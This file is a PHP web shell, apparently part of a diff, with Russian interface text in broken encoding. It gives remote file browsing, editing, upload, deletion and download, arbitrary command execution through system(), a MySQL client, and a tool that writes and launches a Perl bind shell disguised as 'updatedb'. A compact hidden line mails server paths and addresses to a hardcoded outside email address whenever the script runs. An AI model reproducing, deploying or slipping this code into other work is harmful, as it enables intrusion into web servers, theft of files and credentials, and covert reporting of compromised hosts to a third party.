+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD1yy1G3sdEtDPDEIorCCRpXOOWGAMAHuPqc9K4bx5481Twp4c03xVolpaRjU3EM1rcozqzbSRINrLzhQAeMjGc4Xb1NpqOhTaXpznX9MgnS1hU754yyMq8YBbgjceoNeb/AB2u9IPw+0TT9M1K1uxbXaIBFOrsFETgE4NN8ttNyVe+ux//2Q==',
+'bg'=>
+'R0lGODlhCAAbAPQAAOTq8uLp8uDo8d7m8N3l79vj7tni7dfh7dXf7NTe69Pe69Ld6tLc6tDb6c7a6MzY6MrX58nW5sfU5cXT5MPS48PR48HQ4sLQ48DP4r/P4r7O4b7N4b3N4b3N4L3M4LzM4CwAAAAACAAbAAAFXCAgjmJgnqagrurgvi4hz3Jh37ah7/rh/z6EcChUGI8KhnK5aDae0KdjSp0+rtgrZMvdRr7gr2RMHk/O6HNlza5Y3nBLZk7PYO6bvH7z6fv3gBt1c3cYcW9tiRQhADs=',
+'file'=>
+'/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAAQAA4DASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z',
+);
+@ob_clean();
+header("Content-type: image/gif");
+header("Cache-control: public");
+header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+header("Cache-control: max-age=".(60*60*24*7));
+header("Last-Modified: ".date("r",filemtime(__FILE__)));
+echo base64_decode($img[$imgname]);
+die;
+}
+
+if ($_GET[pass]==$aupassword)
+{
+$_SESSION[aupass]=md5($aupassword);
+}
+if ($hiddenmode=="false")
+if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]==""))
+{
+$diz="ok";
+echo "
+$style<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
+<form name='zapros' method='get' action=''>
+<table width='100' border='2' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>
+<tr align='center' >
+<td>
+Enter your password:
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input name='pass' size=24  type='password' value=''>
+</td>
+</tr>
+<tr align='center' >
+<td>
+<input type='submit'>
+</td>
+</tr>
+</table>
+</form>
+";
+}
+if ($_SESSION[aupass]!="")
+{
+if (!$_GET and !$_POST or isset($pass)) 
+$show="start";
+
+function ext($str){
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]==".")
+return substr($str,strlen($str)-$i,strlen($str));}
+return $str;
+}
+function extractfilename($str){
+$str=str_replace("\\","/",$str);
+for ($i=1; $i<strlen($str); $i++) {
+if ($str[strlen($str)-$i]=="/")
+return substr($str,strlen($str)-$i+1,strlen($str));}
+return $str;
+}
+function untag($str){
+$str= str_replace("<","&#0060;",$str);
+$str= str_replace(">","&#0062;",$str);
+return $str;
+}
+function fsize($filename){
+$s=filesize($filename);
+if ($s>1048576){
+return round(($s/1048576),2)." mb";
+}
+if ($s>1024){
+return round(($s/1024),2)." kb";
+}
+return $s." byte";
+}
+function tourl($str){
+$str= urlencode($str);
+return $str;
+}
+function unbug($str){
+$str = stripslashes($str);
+return $str;
+}
+function countbyte($filesize) {
+if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+else { $filesize = $filesize . ""; }
+return $filesize;
+}
+function downloadfile($file) {
+if (!file_exists("$file")) die;
+$size = filesize("$file");
+$filen=extractfilename($file);
+header("Content-Type: application/force-download; name=\"$filen\"");
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: $size");
+header("Content-Disposition: attachment; filename=\"$filen\"");
+header("Expires: 0");
+header("Cache-Control: no-cache, must-revalidate");
+header("Pragma: no-cache");
+readfile("$file");
+die;
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+function anonim_mail($from,$to,$subject,$text,$file){
+ $fp = fopen($file, "rb");
+ while(!feof($fp))
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "sendfile  (".extractfilename($file).")";
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $from\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+  $info  = $text;
+  $filename=extractfilename($file);
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filename \nContent-disposition: inline; filename=$filename \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+  $send = mail($to, $subject, $info, $headers);
+fclose($fp);
+echo "<script language=\"javascript\">location.href=\"javascript:history.back(-1)\";\nalert('Ôàéë $filename îòïğàâëåí íà $to');</script>";
+die;
+}
+if (!empty($_GET[downloadfile])) downloadfile($_GET[downloadfile]);
+if (!empty($_GET[mailfile])) anonim_mail($email,$email,$_GET[mailfile],'File: '.$_GET[mailfile],$_GET[mailfile]);
+
+$d=$_GET[d];
+if (empty($d) or !isset($d)){
+$d=realpath("./");
+$d=str_replace("\\","/",$d);
+}
+$showdir="";
+$bufdir="";
+$buf = explode("/", $d);
+for ($i=0;$i<sizeof($buf);$i++){
+$bufdir.=$buf[$i];
+$showdir.="<a href='$php_self?d=$bufdir&show'>$buf[$i]/</a>";
+$bufdir.="/";
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz]))
+echo <<< EOF
+<title>$d</title>
+<style type="text/css">
+body,td,th 
+{
+	font-family: Fixedsys;
+            font-family: "Times New Roman", Times, serif;
+	font-size: 0.4cm;
+	color: #444444;
+}
+body 
+{
+	background-color: #EEEEEE;
+}
+
+.style3 {
+	font-size: 1.5cm;
+	font-family: "Comic Sans MS";
+}
+.style4 {color: #FFFFFF}
+.style5 {color: #0000FF}
+.style6 {color: #FFFF00}
+.style7 {color: #CCCCCC}
+.style8 {color: #FF00FF}
+.style9 {color: #00FF00}
+.style10 {color: #00FFFF}
+</style>
+$style
+<table border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#999999">
+<tr height="10">
+<td align="center" bordercolor="#000000" bgcolor="#FFFFFF">
+<div style="background-color:#FFFFF0">$showdir</div>
+EOF;
+
+function perms($file) 
+{ 
+$mode=fileperms($file);
+if( $mode & 0x1000 ) 
+$type='p';
+else if( $mode & 0x2000 ) 
+$type='c'; 
+else if( $mode & 0x4000 ) 
+$type='d'; 
+else if( $mode & 0x6000 ) 
+$type='b'; 
+else if( $mode & 0x8000 ) 
+$type='-';
+else if( $mode & 0xA000 ) 
+$type='l'; 
+else if( $mode & 0xC000 ) 
+$type='s'; 
+else 
+$type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function updir($dir){
+if (strlen($dir)>2){
+for ($i=1; $i<strlen($dir); $i++) {
+if (($dir[strlen($dir)-$i]=="/") or  ($dir[strlen($dir)-$i]=="\\"))
+return substr($dir,0,strlen($dir)-$i);}} 
+else return $dir;
+}
+
+if (isset($show) or isset($_REQUEST[edit]) or isset($_REQUEST[tools]) or isset($_REQUEST[db_user]) or isset($_REQUEST[diz])){
+$backdir=updir($d);
+echo <<< EOF
+<table width="505" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFFFF0" style="height:30px;background-image: url($PHP_SELF?imgname=bg); background-position: center; background-repeat: repeat-x;">
+  <tr height="15">
+    <td onClick='location.href="$PHP_SELF?d=$backdir&show"' width="20%" align="center">
+Ââåğõ
+    </td>
+    <td onClick='location.href="javascript:history.back(-1)"' width="20%" align="center">
+Íàçàä
+    </td>
+    <td onClick='location.href="$PHP_SELF"'  width="20%" align="center">
+ íà÷àëî
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&tools"'  width="20%" align="center">
+Èíñòğóìåíòû
+    </td>
+    <td onClick='location.href="$PHP_SELF?d=$d&show"'  width="20%" align="center">
+Ê ñïèñêó
+    </td>
+  </tr>
+</table>
+EOF;
+
+$free = countbyte(diskfreespace("./"));
+if (!empty($free)) echo "Äîñòóïíîå äèñêîâîå ïğîñòğàíñòâî : <font face='Tahoma' size='1' color='#000000'>$free</font><br>";
+$os=exec("uname");
+if (!empty($os)) echo "Ñèñòåìà :".$os."<br>";
+if (!empty($REMOTE_ADDR)) echo "Âàø IP: <font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font><br>";
+$ghz=exec("cat /proc/cpuinfo | grep GHz");
+if (!empty($ghz)) echo "Èíôà î æåëåçå:(GHz)".$ghz."<br>";
+$mhz=exec("cat /proc/cpuinfo | grep MHz");
+if (!empty($mhz)) echo "Èíôà î æåëåçå:(MHz) ".$mhz."<br>";
+$my_id=exec("id");
+if (!empty($my_id)) echo "<div style=\"background-color:#000000\"><span class=\"style4\">Ïîëüçîâàòåëü:".$my_id."</span></div>";
+}
+
+function showdir($df) {
+$df=str_replace("//","/",$df);
+$dirs=array();
+$files=array();
+if ($dir=opendir($df)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$df/$file")){
+$dirs[]=$file;}
+else {
+$files[]=$file;}}}
+closedir($dir);
+sort($dirs);
+sort($files);
+echo <<< EOF
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+EOF;
+for ($i=0; $i<count($dirs); $i++){
+$perm=perms("$df/$dirs[$i]");
+echo <<< EOF
+  <tr height="1">
+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?d=$df/$dirs[$i]&show"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=dir></a></span></td>
+    <td width="241" bgcolor="#FFFFF0"><a href="$PHP_SELF?d=$df/$dirs[$i]&show">$dirs[$i]</a></td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?deldir=$df/$dirs[$i]/">Óäàëèòü</a></td>
+    <td width="51" align="center" bgcolor="#EFFFFF"><span class="style8"><center>Êàòàëîã</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF0">$perm</td>
+  </tr>
+EOF;
+}
+for ($i=0; $i<count($files); $i++) {
+$attr="";
+if (!$fi=@fopen("$df/$files[$i]","r+")){
+$attr=" ONLY_READ ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]&readonly\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if (!$fi=@fopen("$df/$files[$i]","r")){
+$attr=" Can't_READ ";
+$read="";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";}
+else fclose($fi);
+if ($attr==""){
+$attr=" READ/WRITE ";
+$read=" href=\"$PHP_SELF?edit=$df/$files[$i]\"";
+$write=" href=\"$PHP_SELF?delfile=$df/$files[$i]\"";
+}
+$perm=perms("$df/$files[$i]");
+$it="file";
+switch (ext($files[$i])) {
+case ".txt": $it="txt"; break;
+case ".php": $it="txt"; break;
+case ".htm": $it="txt"; break;
+case ".log": $it="txt"; break;
+case ".pl": $it="txt"; break;
+case ".asm": $it="txt"; break;
+case ".bat": $it="txt"; break;
+case ".bash_profile": $it="txt"; break;
+case ".bash_history": $it="txt"; break;
+case ".ini": $it="txt"; break;
+case ".php3": $it="txt"; break;
+case ".html": $it="txt"; break;
+case ".cgi": $it="txt"; break;
+case ".inc": $it="txt"; break;
+case ".c": $it="txt"; break;
+case ".cpp": $it="txt"; break;
+}
+$fsize = fsize("$df/$files[$i]");
+echo <<< EOF
+  <tr height="1">
+    <td width="1" height="1" align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF"><span class="style2"><a href="$PHP_SELF?downloadfile=$df/$files[$i]"><img HSPACE=3 border=0 src=$PHP_SELF?imgname=$it></a></span></td>
+    <td width="241" bgcolor="#00FFFF"><a$read>$files[$i] </a> ($fsize)</td>
+    <td width="100" align="center" bgcolor="#FFFFFF"><a href="$PHP_SELF?rename=1&filetorename=$files[$i]&d=$df&diz">ren</a>/<a$write>del</a>/<a href="$PHP_SELF?downloadfile=$df/$files[$i]">get</a>/<a href="$PHP_SELF?mailfile=$df/$files[$i]">mail</a></td>
+    <td width="51" align="center" bgcolor="#FFEFEF"><span class="style8"><center>$attr</center></span></td>
+    <td width="113" align="center" bgcolor="#FFFFF9">$perm</td>
+  </tr>
+EOF;
+}
+echo "</table>";
+if (count($dirs)==0 && count($files)==0){
+echo <<< EOF
+<table width="505" height="24" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+  <tr>
+    <td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">Ïàïêà ïóñòà</td>
+  </tr>
+</table>
+EOF;
+}}
+
+$edit=$_REQUEST[edit];
+if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){
+$file=fopen($edit,"r") or die ("Íåò äîñòóïà ê ôàéëó $edit");
+if (filesize($edit) > 0)
+$tfile=fread($file,filesize($edit)) or die ("Íåò äîñòóïà ê ôàéëó $edit");
+else $tfile = "";
+fclose($file);
+$tfile = htmlspecialchars($tfile,ENT_QUOTES);
+echo "
+<center>
+<form  action=\"$PHP_SELF\" method=\"POST\">";
+$mydir=updir($edit);
+echo "
+<a href=\"$PHP_SELF?d=$mydir&show\">Âåğíóòüñÿ ê $mydir/</a><br>
+Âû ğåäàêòèğóåòå ôàéë : $edit<br>
+<a href=\"$PHP_SELF?edit=$edit&ashtml\"><span class=\"style4\">Ïğîñìîòğåòü ıòîò ôàéë â âèäå HTML</span></a>
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+<textarea name=\"texoffile\" rows=\"25\" cols=\"60\" wrap=\"OFF\">$tfile</textarea>
+<br><input type=\"hidden\" name=\"nameoffile\" value=\"$edit\" >
+";
+if (!isset($_REQUEST[readonly]))
+echo "<input type=\"submit\"  value=\"            Ñîõğàíèòü            \" >";
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</form>
+</center>
+";
+}
+if (isset($edit) && (!empty($edit)) && (isset($ashtml))){
+$mydir=updir($edit);
+echo "
+<center>
+<a href=\"$PHP_SELF?d=$mydir&show\">Âåğíóòüñÿ ê $mydir/</a><br>
+Âû ïğîñìàòğèâàåòå ôàéë : $edit
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+";
+readfile($edit);
+echo "
+<hr width=\"100%\" size=\"2\"  color=\"#000000\">
+</center>
+";
+}
+
+if (isset($texoffile) && isset($nameoffile))
+{
+$texoffile=unbug($texoffile);
+$f = fopen("$nameoffile", "w") or die ("Íåò äîñòóïà ê ôàéëó $nameoffile");
+fwrite($f, "$texoffile");
+fclose($f);
+$mydir=updir($nameoffile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&show\">";
+die;
+}
+
+if (isset($_REQUEST[delfile]) && ($_REQUEST[delfile]!=""))
+{
+$delfile=$_REQUEST[delfile];
+$mydir=updir($delfile);
+$deleted = unlink("$delfile");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+function deletedir($directory) {
+if ($dir=opendir($directory)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$directory/$file"))  {
+deletedir($directory."/".$file);} 
+else {unlink($directory."/".$file);}}}
+closedir($dir);
+rmdir("$directory/$file");
+}
+if (isset($_REQUEST[deldir]) && (!empty($_REQUEST[deldir]))){
+$deldir=$_REQUEST[deldir];
+$mydir=updir(updir($deldir));
+deletedir("$deldir");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+die;
+}
+
+if (isset($show)){showdir("$d");}
+
+{
+if (isset($_REQUEST[tools]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+.: Äåéñòâèÿ äëÿ äàííîé ïàïêè :.
+</td>
+</tr>
+</table>
+</center>
+EOF;
+if (isset($_REQUEST[tools]) or isset($_REQUEST[tmkdir]))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Ñîçäàòü ïàïêó :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=tools>
+<input type=text size=55 name=newdir value="$d/Íîâàÿ ïàïêà">
+<input type=submit value="ñîçäàòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newdir) && ($newdir!=""))
+{
+$mydir=updir($newdir);
+mkdir($newdir,"7777");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if(@$_GET['rename']){
+echo "<b><font color=green>RENAME $d/$filetorename ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$filetorename</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$filetorename'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+@$rto=$_POST['rto'];
+if($rto){
+$fr1=$d."/".$filetorename;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+rename($fr1,$to1);
+echo "File <br><b>$filetorename</b><br>Renamed to <b>$rto</b><br><br>";
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=$PHP_SELF?d=$d&show\">";}
+echo $copyr;
+exit;
+}
+
+if (isset($tools) or isset($tmkfile))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Ñîçäàòü ôàéë :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=text size=55 name=newfile value="$d/newfile.php">
+<input type=hidden name=tools>
+<input type=submit value="ñîçäàòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($newfile) && ($newfile!="")){
+$f = fopen("$newfile", "w+");
+fwrite($f, "");
+fclose($f);
+$mydir=updir($newfile);
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$mydir&show\">";
+}
+
+if (isset($tools) or isset($tbackdoor))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="POST">
+.: Îòêğûòü ïîğò :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+Èìÿ ñêğèïòà: <input type=text size=13 name=bfileneme value="bind.pl"> Ïîğò: <input type=text size=10 name=bport value="65426">
+<input type="hidden" name="d" value="$d" >
+<input type=hidden name=tools>
+<input type=submit value="âûïîëíèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($bfileneme) && ($bfileneme!="") && isset($bport) && ($bport!="")){
+$script="
+#!/usr/bin/perl
+\$port = $bport; 
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+\$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";
+
+$f = fopen("$d/$bfileneme", "w+");
+fwrite($f, $script);
+fclose($f);
+system("perl $d/$bfileneme");
+echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?d=$d&show\">";
+}
+
+if (isset($tools) or isset($tbash))
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form  action="$PHP_SELF" method="GET">
+<input type="hidden" name="d" value="$d" >
+.: Âûïîëíèòü êîìàíäó :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<input type=hidden name=diz>
+<input type=hidden name=tbash>
+<input type=text size=55 name=cmd value="$cmd">
+<input type=submit value="âûïîëíèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+
+if (isset($cmd) && ($cmd!="")){
+echo "<pre><div align=\"left\">";
+system($cmd);
+echo "</div></pre>";
+}
+
+if (isset($tools) or isset($tupload)){
+$updir="$d/"; 
+if(empty($go)) {
+echo <<< EOF
+<center>
+<table width="505" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
+<tr height="10">
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFF8FF">
+<form ENCTYPE="multipart/form-data"  action="$PHP_SELF" method="post">
+.: Çàêà÷àòü ôàéë â òåêóùèé êàòàëîã :.
+</td>
+</tr height="10">
+<tr>
+<td align="center" bordercolor="#ECE9D8" bgcolor="#FFFFFF">
+<INPUT NAME="userfile" TYPE="file" SIZE="40">
+<input type="hidden" name="d" value="$d">
+<input type=hidden name=diz>
+<input type=hidden name=tupload>
+<input type="submit" name=go value="Îòïğàâèòü">
+</form>
+</td>
+</tr>
+</table>
+</center>
+EOF;
+}
+else {
+if (is_uploaded_file($userfile)) { 
+$fi = "Çàêà÷åí ôàéë $userfile_name ğàçìåğîì $userfile_size áàéò â äèğåêòîğèş $updir";
+}
+echo "$fi<br><a href='$PHP_SELF?d=$d&show&tupload'>Íàçàä ê êàòàëîãó</a>";
+}
+if (is_uploaded_file($userfile)) {
+$dest=$updir.$userfile_name;
+move_uploaded_file($userfile, $dest);
+}}
+
+if ((isset($db_server)) || (isset($db_user)) || (isset($db_pass))  ){
+mysql_connect($db_server, $db_user, $db_pass) or die("íå ìîãó ïîäêëş÷èòüñÿ ê áàçå");
+}
+
+if ((isset($dbname)) and (isset($table)) )
+{
+foreach($_POST as $var => $val)
+if (substr($var,0,7) == 'newpole'){
+if (substr($var,7,strlen($var)) !== ''){
+$indif=substr($var,7,strlen($var));
+echo " $val ";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+if ($xvar == "") 
+$xvar .= $indif;
+else
+$xvar .= ",".$indif;
+if ($xval == "") 
+$xval .= "'$val'";
+else
+$xval .= ",'$val'";
+}}
+
+if ($xvar != ""){
+mysql_query("INSERT INTO $table ($xvar) values ($xval)");
+}
+
+echo "<a href=$PHP_SELF?showtables=$dbname&db_server=$db_server&db_user=$db_user&db_pass=$db_pass>Íàçàä ê ñïèñêó òàáëèö ÁÄ:$dbname</a>";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select * from $table");
+echo "<table width='505' border='1' align='center' cellpadding='0' cellspacing='0' bordercolor='#CCCCFF' bgcolor='#FFFFFF'>";
+
+$res=mysql_fetch_array($re);
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "<td bgcolor='#CCCCFF' bordercolor='#FFFFFF'><center>$var</center></td>";
+}}
+echo "<td></td></tr>";
+
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+$param="limit $_SESSION[limit]";
+
+$re=mysql_query("select * from $table $param");
+
+while($res=mysql_fetch_array($re)){
+echo "<tr>";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if (!$pixidname){
+$pixidname=$var;
+$pixid=$val;
+}
+if ($nvar == 128945432){
+$valtext=untag($val);
+if ($valtext == "") $valtext="=Ïóñòî=";
+
+
+if ($_SESSION[lenth] == "on"){
+if (strlen($valtext)>40){
+$valtext=substr($valtext,0,40);
+$valtext .="...";
+}}
